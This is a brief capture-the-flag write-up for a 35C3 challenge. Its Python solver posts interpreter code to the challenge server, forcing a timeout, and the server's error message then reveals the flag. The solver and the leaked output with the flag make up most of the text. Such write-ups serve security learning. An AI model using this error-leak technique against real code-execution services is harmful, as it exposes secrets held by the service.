Rating:

Timeout error leaks flag. If we pause for more than 5 seconds in our code. The error will be triggered.

```
import requests
payload = {'code' : 'if charAt(DEV_NULL, 0) == \'3\' then pause(10000) end'}
r = requests.post('http://35.207.189.79/wee/dev/null', json = payload)
print r.text

'''
# python solver.py

{"error":"Command '['ts-node', '--cacheDirectory', '../weelang/__cache__', '../weelang/weeterpreter.ts', \"\\n var DEV_NULL: string = '35C3_TH3_SUN_IS_TH3_SAM3_YOU_RE_OLDER'\\n if charAt(DEV_NULL, 0) == '3' then pause(10000) end\\n \"]' timed out after 5 seconds"}

'''
```